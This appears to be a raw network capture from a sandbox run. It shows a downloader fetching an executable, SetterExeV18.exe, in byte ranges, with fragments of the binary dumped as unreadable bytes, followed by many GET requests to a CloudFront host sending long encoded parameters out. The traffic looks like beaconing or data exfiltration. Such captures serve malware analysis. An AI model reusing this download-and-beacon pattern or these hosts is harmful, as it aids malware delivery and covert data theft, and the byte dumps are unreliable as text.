Last-Modified: Tue, 25 Nov 2014 14:05:45 GMT

ETag: "05c47da12b0009bd98653f51287f7768"

Accept-Ranges: bytes

Server: AmazonS3

Age: 64835

X-Cache: Hit from cloudfront

Via: 1.1 a034346227db119f7e0813186ca2d2c2.cloudfront.net (CloudFront)

X-Amz-Cf-Id: FsDAYkxk2XssNWIwo0JzA2LXQpVjlT2zjtCWJVvPC-tU_XcSyLk26w==

[email protected]......

..!..L.!This program cannot be run in DOS mode....$.......gu..#...#...

#.......!...........#...........I......."......."......."...Rich#.....

......................PE..L...9.dT...........!................P.......

.................................`....................................

[email protected]......

................................8............................text...O.

.......................... ..`[email protected]@

.data...x.... ....... [email protected]

[email protected]@[email protected]

......................................................................

......................................................................

......................................................................

......................................................................

......................................................................

......................................................................

......................................................................

......................................................................

......................................................................

......................................................................

......................................................................

..................................................................

<<< skipped >>>

GET /SetterExeV18.exe HTTP/1.1

Range: bytes=0-249999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d11sfnc01fj8ag.cloudfront.net

Connection: Keep-Alive

HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

Cache-Control: private

Last-Modified: Tue, 28 Jul 2015 20:29:52 GMT

Accept-Ranges: bytes

ETag: "a670962874c9d01:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Mon, 20 Mar 2017 00:19:55 GMT

Content-Range: bytes 0-249999/520704

X-Cache: Miss from cloudfront

Via: 1.1 27b3a801292660302bc6c8d6a96c71ce.cloudfront.net (CloudFront)

X-Amz-Cf-Id: MJpICvSj2Cydx-1WUjll0t1VA0m2Ma9kx_kASN-RYyDUhX-SsbfcrA==

[email protected]......

..!..L.!This program cannot be run in DOS mode....$.......]O..........

......*......|2......|..K....|.......V~.............dW..-....|6.......

z.....dW3.....Rich....................PE..L......U....................

[email protected]@[email protected]

...........................>..................................tY...

[email protected]......

..........text...E........................... ..`.rdata...............

[email protected]@.data....[...`[email protected]

..........|[email protected]@[email protected]

......................................................................

......................................................................

......................................................................

......................................................................

...............................................h`.E..uW..Y.V...F.V.^..

.YPV..wG... ..hk.E..PW..Y^.V...F.V.8...YPV..vG... ..hz.E..*W..Y^.V...F

.V.....YPV..vG..\ ..h..E...W..Y^.V...F.V.....YPV..vG..6 ..h..E...V..Y^

.V...F.V.....YPV..vG... ..h..E...V..Y^.V...F.V.....YPV..vG......h..E..

.V..Y^.V...F.V.z...YPV.PvG......h..E..lV..Y^.h..F....G......h..E..PV..

Y.h..F....G......h..E..5V..Y.V.(.F.V.....YPV.hvG..h...h..E...V..Y^.V.8

.F.V.....YPV..vG..B...h..E...U..Y^.h&.E...U..Y.h..E...U..Y.h..E...U..Y

[email protected]^.V...F.V.|...YPV

<<< skipped >>>

GET /SetterExeV18.exe HTTP/1.1

Range: bytes=500000-520703

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d11sfnc01fj8ag.cloudfront.net

Connection: Keep-Alive

HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 20704

Connection: keep-alive

Cache-Control: private

Last-Modified: Tue, 28 Jul 2015 20:29:52 GMT

Accept-Ranges: bytes

ETag: "a670962874c9d01:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Mon, 20 Mar 2017 00:19:56 GMT

Content-Range: bytes 500000-520703/520704

X-Cache: Miss from cloudfront

Via: 1.1 27b3a801292660302bc6c8d6a96c71ce.cloudfront.net (CloudFront)

X-Amz-Cf-Id: 3GTcsb7j63vuDDgY2d3TJxFAlC8gP__tZGa3NEqL3Ij31jqEzaeSAA==

HTTP/1.1 206 Partial Content..Content-Type: application/octet-stream..

Content-Length: 20704..Connection: keep-alive..Cache-Control: private.

.Last-Modified: Tue, 28 Jul 2015 20:29:52 GMT..Accept-Ranges: bytes..E

Tag: "a670962874c9d01:0"..Server: Microsoft-IIS/7.5..X-Powered-By: ASP

.NET..Date: Mon, 20 Mar 2017 00:19:56 GMT..Content-Range: bytes 500000

-520703/520704..X-Cache: Miss from cloudfront..Via: 1.1 27b3a801292660

302bc6c8d6a96c71ce.cloudfront.net (CloudFront)..X-Amz-Cf-Id: 3GTcsb7j6

3vuDDgY2d3TJxFAlC8gP__tZGa3NEqL3Ij31jqEzaeSAA==......`...1090.0.1y1.1.

1.1.1.1.2R2.5.5j6p6.6.6.7.7.7.8.8.9.9.:.:2:.:.:.;.;.<.<.<f&gt

;.>.>.>V?y?.?.?......d...O0.0.0.1.1S1.2.2.2.2.2.3.3.4.4.4.6.6

.7 7.7.7.7!8|8.9.989D9.92:.:.:.:.;.;.;0<?<[<j<.= =.=s>}

>....(...!101>1.1.1.5.5.5N9]9k9.9.9R=a=o=.........0.1.1.2;2H2\2.

2.4P4v4.4.5i6.6.6.6.6.6.7.7 7W7d7x7.7.7.7.7.7.848L8R8.8.8.8.8.959.9.9.

: :l:.:.:.:.;X;.;.;.;I<.<.<.<.=.=.=.=.=.>;>P>h&gt

;y>.>. .......010.0.0.0.1W1\1t1.1.1.1.1.222N2S2_2d2|2.2.2.2.2.2.

2.3*3:3P3x3.3.3.3.3.3.3.3.4.4!4-424>4C4O4T4r4.4.4n5.6.6.6.6'777.9.9

.9.9P:Y:b:q:.:a<.<.<.=.=.>.>...0.......1)1c1|1.1.1.2.2a

2.2.2.2.2'3^3.3.304j4.4.4.4.5.5.5a6.6.7.7*787.9.9.9n:~:.:.:.:.:.:.:.;T

;.;.<%<9<M<a<u<.<.<.<.<.<.<.=.=)==

=Q=e=.=.>o>.?|[email protected]%0-040<0D0j0}0.0.0.0

.0.0.0.0.0.1.1u1.2.2.2.2.2)2o2.2.2.2.2.2.3.3!3*323:3}3.3.3.3.3.3.4.4.4

D5T5.5.5.5.5.5.5.5.5.5,6E6V6.6.6.667G7.7.8X8`8u8.8.8.8.9j9.9.9.9.9

<<< skipped >>>

GET /SetterExeV18.exe HTTP/1.1

Range: bytes=250000-499999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d11sfnc01fj8ag.cloudfront.net

Connection: Keep-Alive

HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

Cache-Control: private

Last-Modified: Tue, 28 Jul 2015 20:29:52 GMT

Accept-Ranges: bytes

ETag: "a670962874c9d01:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Mon, 20 Mar 2017 00:19:55 GMT

Content-Range: bytes 250000-499999/520704

X-Cache: Miss from cloudfront

Via: 1.1 0f0009772734d6975e26e0a8bc4716ea.cloudfront.net (CloudFront)

X-Amz-Cf-Id: nVRXnqt6YpKbRAvPpj1frNP0pGRh4MSG72XC7nZe3sGBVCslJyaepA==

HTTP/1.1 206 Partial Content..Content-Type: application/octet-stream..

Content-Length: 250000..Connection: keep-alive..Cache-Control: private

..Last-Modified: Tue, 28 Jul 2015 20:29:52 GMT..Accept-Ranges: bytes..

ETag: "a670962874c9d01:0"..Server: Microsoft-IIS/7.5..X-Powered-By: AS

P.NET..Date: Mon, 20 Mar 2017 00:19:55 GMT..Content-Range: bytes 25000

0-499999/520704..X-Cache: Miss from cloudfront..Via: 1.1 0f0009772734d

6975e26e0a8bc4716ea.cloudfront.net (CloudFront)..X-Amz-Cf-Id: nVRXnqt6

YpKbRAvPpj1frNP0pGRh4MSG72XC7nZe3sGBVCslJyaepA==........Y.e...=..G....

......<.G......E..8.G..}.........5..G..5T.E......]...tt.5..G......]

..}..}.....}.;.rWj...P.E.9.t.;.rG.7....j...P.E......5..G..5T.E....E..5

..G....M.9M.u.9E.t..M....]..E.....h..E.h..E......YYh..E.h..E......YY.E

...... ....}..u)....G.....j..'...Y.u..\....}..t.j......Y.......U..j.j.

.u.........].U...}..u.............t......]..u.j..5h.G.....E.].........

.h`.C.d.5.....D$..l$..l$. [email protected]

.M.d......Y__^[..]Q........U.....S.].VW.E...{[email protected]

[email protected]......

[email protected]@..L........E...t{..........M.....~...~h.E..8csm.u(.=..E..t.h..E.

[email protected].X....

..tu.f.M..]........^.....tG.!.E........{[email protected]

O...3.0.K....W..O...3.2.;....E._^[..]..O...3.0.$....G..O...3.0......M.

...I..&......U....([email protected]}[email protected]

..................0.............................................f.

<<< skipped >>>

GET /p.ashx?e=obiBp3WOda8YEV9pcuJwXtjCW9 eJMmAWub0ofDzkCEegceCn LKWZkWWo76FGxQr J80GV4qARlUrzhzYzRp9T0p0D2ZyJQsnGPPRmjDA5d2L30lHqijijq6TspxE6m6TnR9dT7ayjH2CJtGrtsnASlhOyjLJ/CbfW9VjeXxBEUN4frQ/ABXA9OLpJMWKahtbjfpf6GllFxBbrJqAIXPkCN9h bV19VAhTD7v1xeC4pGvADS7bOhhWoLVpCM9iEhqt6HrlyoIuXkcHJamqYAkU5MDCXDxgXn558pQYeTa 1l 1OLNhgAaPzXL8pY6Nn8Drm/gTHnKRatpWcD7V21UixaxLjlbxVMF4Batz9n/4= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d1y2jryd6u59ns.cloudfront.net

HTTP/1.1 200 OK

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

Server: Microsoft-IIS/8.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Mon, 20 Mar 2017 00:19:55 GMT

X-Cache: Miss from cloudfront

Via: 1.1 15191055e43ba835d0fead01ae84015c.cloudfront.net (CloudFront)

X-Amz-Cf-Id: WDJQ_AmQCj3DOUvDNet276USb0n9R5Syp64R51jcdIB_hNelRlGALw==

....

GET /p.ashx?e=aQQpsP6/AW3U0UsIWSR1jVRnyF84anr3YDEAjQn1Lmtt1izXJZF/6oareh65cqCLl5HByWpqmAJFOTAwlw8YF5 efKUGHk2vtZftTizYYAGj81y/KWOjZzLYAxbXqOnWZKpgXCSq4SBoojstDGwv8wEB3BDXIoENw3BCY3BRdztfQ36gIM4S0WyMJQRmsW nYPPrzpUjRdY8g5 vR6QEB49De26f9ELU77BAEjXP3GmOBvq/txek z3knywc6xSb HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d1y2jryd6u59ns.cloudfront.net

HTTP/1.1 200 OK

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

Server: Microsoft-IIS/8.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Mon, 20 Mar 2017 00:19:56 GMT

X-Cache: Miss from cloudfront

Via: 1.1 15191055e43ba835d0fead01ae84015c.cloudfront.net (CloudFront)

X-Amz-Cf-Id: I3wvhbsz-MuIPBOjIs_Buwbt20jDNtFQUhamXcycquB_sVRdm2wvCw==

....

GET /p.ashx?e=QgW8pN5r26bof2QYjF1uPwq//z5qhHoX0EzYvxMWJRokIQgzNWOGCn 5ot6 EvdWkYIKgNqWBwS9Kbi6m4oCRvcc ZMAWsaKd CV/tiwlgli8v7N56mSgbKWjlfhE4uZvYsjUyDjDPpQHbPfmjbRP4kEtwV0krU/zEwKmF3LBrNhJ1C2zC9NPmVzJiGxHpFRq/ mwRQciAPvbT dq0IdZd990QLzNFTA30wp9ZePTAnJscN vLrCowpfd9Pvun2DZj3l0wecJba60LKguj6icg== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d1y2jryd6u59ns.cloudfront.net

HTTP/1.1 200 OK

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

Server: Microsoft-IIS/8.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Mon, 20 Mar 2017 00:19:56 GMT

X-Cache: Miss from cloudfront

Via: 1.1 15191055e43ba835d0fead01ae84015c.cloudfront.net (CloudFront)

X-Amz-Cf-Id: tpVNEEjPUKsR3xznGiKszFZH6K4UPVtvA5w5sq1NJ5ZqXWFHL7V4kg==

....

GET /p.ashx?e=b1dRW7RxYKeNWlFVunW/r8YGSI1d A8Aymls69hKl9tmuEHgxcoWKfKgR0o1/4Q2D691IIN//Frcr4ZRnoqTVed w94v0JiTTx7XT5nK5LCnMFC LiKPW3CdmCq5IQSELYVoKyjeTfp30iFVS yzj8CZ3PTQ1UlUpEhiK7 V9AecEbv57UoccxOeRFW191e4SaPEemp2rOI48VIs1kHEk9UB7N1/dopRlFU7gimmHq/JscN vLrCo14/JpwhTbJacCuTErr5qdU= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d1y2jryd6u59ns.cloudfront.net

HTTP/1.1 200 OK

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

Server: Microsoft-IIS/8.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Mon, 20 Mar 2017 00:19:56 GMT

X-Cache: Miss from cloudfront

Via: 1.1 15191055e43ba835d0fead01ae84015c.cloudfront.net (CloudFront)

X-Amz-Cf-Id: N1k_BQdXgQSTh0-hwGBPdcvAa3SBdpFDQ3fU5nVaf4kKvysGzYRyyQ==

....

GET /p.ashx?e=b1dRW7RxYKeNWlFVunW/r8YGSI1d A8Aymls69hKl9tmuEHgxcoWKfKgR0o1/4Q2D691IIN//Frcr4ZRnoqTVed w94v0JiTTx7XT5nK5LCnMFC LiKPW3CdmCq5IQSELYVoKyjeTfp30iFVS yzj8CZ3PTQ1UlUpEhiK7 V9AecEbv57UoccxOeRFW191e4SaPEemp2rOI48VIs1kHEk9UB7N1/dopRDvO0EiF3oHTyyO6Ebs4xmkKABP6K/iqqIBnlKRxyFokkn0XLiH0dH1LtCiNSAKYFf5JnRTepcv7VTVcd9MOBGUtwntjomLvg8OihZvFiIAIMn/yeJ21ljtcBdNV8N7h HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d1y2jryd6u59ns.cloudfront.net

HTTP/1.1 200 OK

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

Server: Microsoft-IIS/8.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Mon, 20 Mar 2017 00:19:56 GMT

X-Cache: Miss from cloudfront

Via: 1.1 15191055e43ba835d0fead01ae84015c.cloudfront.net (CloudFront)

X-Amz-Cf-Id: vj8wThi7a3s8evEhdgzuBZarQwn1qv6TW_2iC4uU7g1LavBzFHaLVQ==

....

GET /p.ashx?e=xY8ohDYpM gO8fn3umFd V2PNcPuKknMw/KXmUS MBMPOudYiEhu9PpaBjL6rcaUmQydu7v0XOmnNguChnjFYyy9pizPgo8YGz00ySamWlnMFAdL1xhsmXw8 OWurQVw3PC7x86FjYgov37HB1B/zlU5UwOzfEgnfa6VRey9pub6LKPMT5YRxqPDlT6qw/1mxko6F4tH/rEF31vgH 2Mrl JfVwpv1Wva0hvOLfOrKD/wvFkFqnHHo4G r 3F6T7MDuG8rKmKv5M2lG/K85LIzCdXy2lTPRW3vJOpxfY9B1A6K4wtfvcx1y2OGa7t1CL4lfxm/XoqxEdjLvQZAWuHXAH fOgpHnMH6wMvCefXXf GeemgIzPxkm30CyQo1Eg HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d1y2jryd6u59ns.cloudfront.net

HTTP/1.1 200 OK

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

Server: Microsoft-IIS/8.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Mon, 20 Mar 2017 00:19:56 GMT

X-Cache: Miss from cloudfront

Via: 1.1 15191055e43ba835d0fead01ae84015c.cloudfront.net (CloudFront)

X-Amz-Cf-Id: C8rVeNrqvcLXnIosG24Fli_NXSvxLH2j51CFR7tAe8VeLJ5lTxwLZw==

HTTP/1.1 200 OK..Content-Length: 0..Connection: keep-alive..Cache-Cont

rol: private, no-store..Server: Microsoft-IIS/8.5..X-AspNet-Version: 4

.0.30319..X-Powered-By: ASP.NET..Date: Mon, 20 Mar 2017 00:19:56 GMT..

X-Cache: Miss from cloudfront..Via: 1.1 15191055e43ba835d0fead01ae8401

5c.cloudfront.net (CloudFront)..X-Amz-Cf-Id: C8rVeNrqvcLXnIosG24Fli_NX

SvxLH2j51CFR7tAe8VeLJ5lTxwLZw==..

....

GET /p.ashx?e=XJYuqQQo69dBmScQe cMuF2PNcPuKknMCkdmPrP3LyEPOudYiEhu9PpaBjL6rcaUmQydu7v0XOmnNguChnjFYyy9pizPgo8YGz00ySamWlnMFAdL1xhsmXw8 OWurQVw3PC7x86FjYgov37HB1B/zlU5UwOzfEgnfa6VRey9pub6LKPMT5YRxqPDlT6qw/1mxko6F4tH/rEF31vgH 2Mrp7TtIX8b4qVoW979 PTPR/sLIuaJBIVfI4G r 3F6T7f9F3I6C91SWT/e9lpr/riA== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d1y2jryd6u59ns.cloudfront.net

HTTP/1.1 200 OK

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

Server: Microsoft-IIS/8.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Mon, 20 Mar 2017 00:19:57 GMT

X-Cache: Miss from cloudfront

Via: 1.1 15191055e43ba835d0fead01ae84015c.cloudfront.net (CloudFront)

X-Amz-Cf-Id: KxTigRIEcxwbVd0v8l-Jwo1o5sj4ldFuNx8wfL38g27Bqi9y48bnpA==

....

GET /p.ashx?e=lOCrbsNL2zWNWlFVunW/r0mQNIN2FjZnymls69hKl9tmuEHgxcoWKfKgR0o1/4Q2D691IIN//Frcr4ZRnoqTVed w94v0JiTTx7XT5nK5LCnMFC LiKPW3CdmCq5IQSELYVoKyjeTfp30iFVS yzj8CZ3PTQ1UlUpEhiK7 V9AecEbv57UoccxOeRFW191e4SaPEemp2rOI48VIs1kHEk3qnzi9PVmqu/rKHYTwtRGYUAvnawhe3hbaBd5qR8ufkww3xXMGSlPc= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d1y2jryd6u59ns.cloudfront.net

HTTP/1.1 200 OK

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

Server: Microsoft-IIS/8.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Mon, 20 Mar 2017 00:19:57 GMT

X-Cache: Miss from cloudfront

Via: 1.1 15191055e43ba835d0fead01ae84015c.cloudfront.net (CloudFront)

X-Amz-Cf-Id: DKpiBbkiJrOz9FrXnZ89Ew1a4WB6hOyBGJjbT-U2db6JIslC6aDWuA==

....

GET /p.ashx?e=lOCrbsNL2zWNWlFVunW/r0mQNIN2FjZnymls69hKl9tmuEHgxcoWKfKgR0o1/4Q2D691IIN//Frcr4ZRnoqTVed w94v0JiTTx7XT5nK5LCnMFC LiKPW3CdmCq5IQSELYVoKyjeTfp30iFVS yzj8CZ3PTQ1UlUpEhiK7 V9AecEbv57UoccxOeRFW191e4SaPEemp2rOI48VIs1kHEk3qnzi9PVmqu/rKHYTwtRGYUAvnawhe3hYcizBU3y3xpkudLwF4whtg= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d1y2jryd6u59ns.cloudfront.net

HTTP/1.1 200 OK

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

Server: Microsoft-IIS/8.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Mon, 20 Mar 2017 00:19:57 GMT

X-Cache: Miss from cloudfront

Via: 1.1 15191055e43ba835d0fead01ae84015c.cloudfront.net (CloudFront)

X-Amz-Cf-Id: Og9L2kgUApwlrapQyHHerAfAMVdGprj0D5LF_xjtzjfOJNMnlr7p3Q==

....

GET /p.ashx?e=WL9usJOVMsOQs n7i1BIkNjCW9 eJMmApZtSBouT4jcegceCn LKWZkWWo76FGxQr J80GV4qARlUrzhzYzRp9T0p0D2ZyJQsnGPPRmjDA5d2L30lHqijijq6TspxE6m6TnR9dT7ayjH2CJtGrtsnASlhOyjLJ/CbfW9VjeXxBEUN4frQ/ABXA9OLpJMWKahtbjfpf6GllFxBbrJqAIXPlLthe3E5HJFfRWApYRElbXqR4rzu9tChTEzQGoF c24CSOMVPCH eA= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d1y2jryd6u59ns.cloudfront.net

HTTP/1.1 200 OK

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

Server: Microsoft-IIS/8.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Mon, 20 Mar 2017 00:19:58 GMT

X-Cache: Miss from cloudfront

Via: 1.1 15191055e43ba835d0fead01ae84015c.cloudfront.net (CloudFront)

X-Amz-Cf-Id: b9uR23ouXqBWjc9tDJU8OTmNowr0EMn16S7liZmnoeQeS72XVRw_VQ==

....

GET /p.ashx?e=WL9usJOVMsPlWW0ay34fCUdUxmGl9EyeYDEAjQn1Lmtt1izXJZF/6oareh65cqCLl5HByWpqmAJFOTAwlw8YF5 efKUGHk2vtZftTizYYAGj81y/KWOjZzLYAxbXqOnWZKpgXCSq4SBoojstDGwv8wEB3BDXIoENw3BCY3BRdztfQ36gIM4S0WyMJQRmsW nYPPrzpUjRdY8g5 vR6QEB/nYE3DWujWaoU2sQ4uGCDUUAvnawhe3hbDffmPgH7pMiQNTh4u5dqPxEMNdFi25Gw== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d1y2jryd6u59ns.cloudfront.net

HTTP/1.1 200 OK

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

Server: Microsoft-IIS/8.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Mon, 20 Mar 2017 00:19:58 GMT

X-Cache: Miss from cloudfront

Via: 1.1 15191055e43ba835d0fead01ae84015c.cloudfront.net (CloudFront)

X-Amz-Cf-Id: I2yw_weYa1bF4D36PoW1hN9W5PQOFh6-BUBVOz50hFEzo5ycZ2t6OQ==

....

GET /p.ashx?e=WL9usJOVMsPlWW0ay34fCUdUxmGl9EyeYDEAjQn1Lmtt1izXJZF/6oareh65cqCLl5HByWpqmAJFOTAwlw8YF5 efKUGHk2vtZftTizYYAGj81y/KWOjZzLYAxbXqOnWZKpgXCSq4SBoojstDGwv8wEB3BDXIoENw3BCY3BRdztfQ36gIM4S0WyMJQRmsW nYPPrzpUjRdY8g5 vR6QEB/nYE3DWujWaoU2sQ4uGCDUUAvnawhe3hYcizBU3y3xpkudLwF4whtg= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d1y2jryd6u59ns.cloudfront.net

HTTP/1.1 200 OK

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

Server: Microsoft-IIS/8.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Mon, 20 Mar 2017 00:19:58 GMT

X-Cache: Miss from cloudfront

Via: 1.1 15191055e43ba835d0fead01ae84015c.cloudfront.net (CloudFront)

X-Amz-Cf-Id: UF5lcNfBdJgA2UzQBxPBz2aP2HuF_tBQN193VZwLiY3Off-O-5QicA==

HTTP/1.1 200 OK..Content-Length: 0..Connection: keep-alive..Cache-Cont

rol: private, no-store..Server: Microsoft-IIS/8.5..X-AspNet-Version: 4

.0.30319..X-Powered-By: ASP.NET..Date: Mon, 20 Mar 2017 00:19:58 GMT..

X-Cache: Miss from cloudfront..Via: 1.1 15191055e43ba835d0fead01ae8401

5c.cloudfront.net (CloudFront)..X-Amz-Cf-Id: UF5lcNfBdJgA2UzQBxPBz2aP2

HuF_tBQN193VZwLiY3Off-O-5QicA==..

GET /p.ashx?e=QgW8pN5r26bof2QYjF1uPwq//z5qhHoX0EzYvxMWJRokIQgzNWOGCn 5ot6 EvdWkYIKgNqWBwS9Kbi6m4oCRvcc ZMAWsaKd CV/tiwlgli8v7N56mSgbKWjlfhE4uZvYsjUyDjDPpQHbPfmjbRP4kEtwV0krU/zEwKmF3LBrNhJ1C2zC9NPmVzJiGxHpFRq/ mwRQciAPvbT dq0IdZd990QLzNFTAqiKuwJ2QNWAL/XWHChDxEUKABP6K/iqqggPnHli0tZCBSCbmHG3q6QlEj4/HBfPTcUDrej7Uo8w= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d1y2jryd6u59ns.cloudfront.net

HTTP/1.1 200 OK

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

Server: Microsoft-IIS/8.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Mon, 20 Mar 2017 00:19:56 GMT

X-Cache: Miss from cloudfront

Via: 1.1 3ccfbae98f5816b531634c1e82e45259.cloudfront.net (CloudFront)

X-Amz-Cf-Id: 6JHsJJEIQeYo0-U4dqKv6CYhch8_WMhUszeoGYkXgpLzvmwM9QdOtA==

....

GET /p.ashx?e=b1dRW7RxYKeNWlFVunW/r8YGSI1d A8Aymls69hKl9tmuEHgxcoWKfKgR0o1/4Q2D691IIN//Frcr4ZRnoqTVed w94v0JiTTx7XT5nK5LCnMFC LiKPW3CdmCq5IQSELYVoKyjeTfp30iFVS yzj8CZ3PTQ1UlUpEhiK7 V9AecEbv57UoccxOeRFW191e4SaPEemp2rOI48VIs1kHEk9UB7N1/dopRLWT0ooBBF1fVw12R6ofm/Y8iQvDAJnGKH8qnmCyK7v7JBTPp2F5gxC Mhrkq09y/amn0hKiMbceR3MOwIZ76JwmTqIjEwZJX8qZPamPhh78rf8SKYsXwuBxaqSxr2X7ENAlt3MuTiXc= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d1y2jryd6u59ns.cloudfront.net

HTTP/1.1 200 OK

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

Server: Microsoft-IIS/8.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Mon, 20 Mar 2017 00:19:56 GMT

X-Cache: Miss from cloudfront

Via: 1.1 3ccfbae98f5816b531634c1e82e45259.cloudfront.net (CloudFront)

X-Amz-Cf-Id: BlAOFcxwbOiXn9xTHFZ1UzETNCtZcA3a9c34Qmz6j7wUpVvdqQUGeg==

....

GET /p.ashx?e=b1dRW7RxYKeNWlFVunW/r8YGSI1d A8Aymls69hKl9tmuEHgxcoWKfKgR0o1/4Q2D691IIN//Frcr4ZRnoqTVed w94v0JiTTx7XT5nK5LCnMFC LiKPW3CdmCq5IQSELYVoKyjeTfp30iFVS yzj8CZ3PTQ1UlUpEhiK7 V9AecEbv57UoccxOeRFW191e4SaPEemp2rOI48VIs1kHEk9UB7N1/dopR5YFWQUANi8 KgQWEQh9QronZvqoB 8mW4yIycFcn/ g= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d1y2jryd6u59ns.cloudfront.net

HTTP/1.1 200 OK

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

Server: Microsoft-IIS/8.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Mon, 20 Mar 2017 00:19:56 GMT

X-Cache: Miss from cloudfront

Via: 1.1 3ccfbae98f5816b531634c1e82e45259.cloudfront.net (CloudFront)

X-Amz-Cf-Id: HbrK3FyvFAcYm46fOi9tRs90Cqn9Eg9S-wuHmAEBaGAYkUkTGH1ZNw==

....

GET /p.ashx?e=b1dRW7RxYKeNWlFVunW/r8YGSI1d A8Aymls69hKl9tmuEHgxcoWKfKgR0o1/4Q2D691IIN//Frcr4ZRnoqTVed w94v0JiTTx7XT5nK5LCnMFC LiKPW3CdmCq5IQSELYVoKyjeTfp30iFVS yzj8CZ3PTQ1UlUpEhiK7 V9AecEbv57UoccxOeRFW191e4SaPEemp2rOI48VIs1kHEk9UB7N1/dopRvcTB46xWnxTTJVfgp7thqbPiCC4paVhd HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d1y2jryd6u59ns.cloudfront.net

HTTP/1.1 200 OK

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

Server: Microsoft-IIS/8.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Mon, 20 Mar 2017 00:19:56 GMT

X-Cache: Miss from cloudfront

Via: 1.1 3ccfbae98f5816b531634c1e82e45259.cloudfront.net (CloudFront)

X-Amz-Cf-Id: gFG1ay4GmQ0_IlYntzciED7awRAsPn-4_J9A49SOEymDwjnkPpy1oA==

....

GET /p.ashx?e=xY8ohDYpM iNWlFVunW/r0mQNIN2FjZnymls69hKl9tmuEHgxcoWKfKgR0o1/4Q2D691IIN//Frcr4ZRnoqTVed w94v0JiTTx7XT5nK5LCnMFC LiKPW3CdmCq5IQSELYVoKyjeTfp30iFVS yzj8CZ3PTQ1UlUpEhiK7 V9AecEbv57UoccxOeRFW191e4SaPEemp2rOI48VIs1kHEk3qnzi9PVmquIApimWCrqakE8SFHLIEPsGc6 n uqijtZ6R90h7cidQhE1rXBz99ttxfA3C6KKE5uvEmaSYLmhGU1IGevJVygthPlRO7ICGTcD5MbnMHcJ64LtTjETGDUCjBYGPK7rWfXeCi/0KZZptbQRhqH8Cssw== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d1y2jryd6u59ns.cloudfront.net

HTTP/1.1 200 OK

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

Server: Microsoft-IIS/8.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

